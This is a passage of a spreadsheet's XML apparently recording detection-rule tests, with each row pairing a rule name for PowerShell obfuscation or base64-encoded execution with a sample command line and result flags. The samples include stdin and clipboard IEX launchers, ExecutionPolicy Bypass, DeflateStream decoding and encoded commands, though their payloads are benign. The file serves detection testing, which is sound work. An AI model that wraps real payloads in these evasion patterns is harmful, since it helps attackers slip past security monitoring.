      <c r="G233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="43" t="n"/>
      <c r="J233" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K233" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="n"/>
      <c r="B234" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C234" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D234" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E234" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="43" t="n"/>
      <c r="J234" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K234" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="43" t="n"/>
      <c r="B235" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C235" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D235" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E235" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="43" t="n"/>
      <c r="J235" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="n"/>
      <c r="B236" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C236" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D236" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E236" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="36" t="n"/>
      <c r="J236" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="43" t="n"/>
      <c r="B237" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C237" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D237" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E237" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="43" t="n"/>
      <c r="J237" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="43" t="n"/>
      <c r="B238" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C238" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D238" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E238" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /C "set a=in&amp;&amp; set b=voke&amp;&amp; set c=!a!!b!&amp;&amp; echo !c! | powershell -"</t>
        </is>
      </c>
      <c r="F238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="43" t="n"/>
      <c r="J238" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K238" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="n"/>
      <c r="B239" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C239" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D239" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E239" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F239" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G239" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H239" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I239" s="43" t="n"/>
      <c r="J239" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K239" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="43" t="n"/>
      <c r="B240" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C240" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D240" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E240" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXecUTionPoLiCY Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I240" s="36" t="n"/>
      <c r="J240" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K240" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="43" t="n"/>
      <c r="B241" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C241" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D241" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E241" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -COMmanD "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I241" s="36" t="n"/>
      <c r="J241" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K241" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="43" t="n"/>
      <c r="B242" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C242" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D242" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E242" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCUTiOnpolIcy Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H242" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I242" s="36" t="n"/>
      <c r="J242" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="43" t="n"/>
      <c r="B243" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C243" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D243" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E243" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F243" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G243" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H243" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I243" s="36" t="n"/>
      <c r="J243" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="43" t="n"/>
      <c r="B244" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C244" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D244" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E244" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -"c" "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H244" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I244" s="36" t="n"/>
      <c r="J244" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="43" t="n"/>
      <c r="B245" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C245" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D245" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E245" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H245" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I245" s="36" t="n"/>
      <c r="J245" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="43" t="n"/>
      <c r="B246" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C246" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D246" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E246" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H246" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I246" s="43" t="n"/>
      <c r="J246" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="43" t="n"/>
      <c r="B247" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C247" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D247" s="36" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E247" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PAYLOAD=Write-Host 'Benign Educational Bypass' &amp; set LAUNCH=powershell.exe -NoP -c \"{1}{0}\" -f 'st','Te' &amp; %LAUNCH%"</t>
        </is>
      </c>
      <c r="F247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I247" s="36" t="n"/>
      <c r="J247" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K247" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="n"/>
      <c r="B248" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C248" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D248" s="36" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E248" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set VAR=Invoke-Expression 'Write-Host Safe' &amp;&amp;set RUN=powershell.exe -c ('Te'+'st') &amp;&amp; %RUN%"</t>
        </is>
      </c>
      <c r="F248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I248" s="36" t="n"/>
      <c r="J248" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K248" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="43" t="n"/>
      <c r="B249" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C249" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D249" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E249" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="43" t="n"/>
      <c r="J249" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K249" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="43" t="n"/>
      <c r="B250" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C250" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D250" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E250" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I250" s="36" t="n"/>
      <c r="J250" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K250" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="43" t="n"/>
      <c r="B251" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C251" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D251" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E251" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="36" t="n"/>
      <c r="J251" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K251" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="43" t="n"/>
      <c r="B252" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C252" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D252" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E252" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I252" s="36" t="n"/>
      <c r="J252" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K252" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="n"/>
      <c r="B253" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C253" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D253" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E253" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I253" s="36" t="n"/>
      <c r="J253" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K253" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="n"/>
      <c r="B254" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C254" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D254" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E254" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I254" s="43" t="n"/>
      <c r="J254" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K254" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="n"/>
      <c r="B255" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C255" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D255" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E255" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXEcutIonpoliCY Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I255" s="43" t="n"/>
      <c r="J255" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K255" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="n"/>
      <c r="B256" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C256" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D256" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E256" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I256" s="43" t="n"/>
      <c r="J256" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K256" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="n"/>
      <c r="B257" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C257" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D257" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E257" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I257" s="43" t="n"/>
      <c r="J257" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K257" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="n"/>
      <c r="B258" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C258" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D258" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E258" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="43" t="n"/>
      <c r="J258" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K258" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="n"/>
      <c r="B259" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C259" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D259" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E259" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I259" s="43" t="n"/>
      <c r="J259" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K259" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="n"/>
      <c r="B260" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C260" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D260" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E260" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I260" s="43" t="n"/>
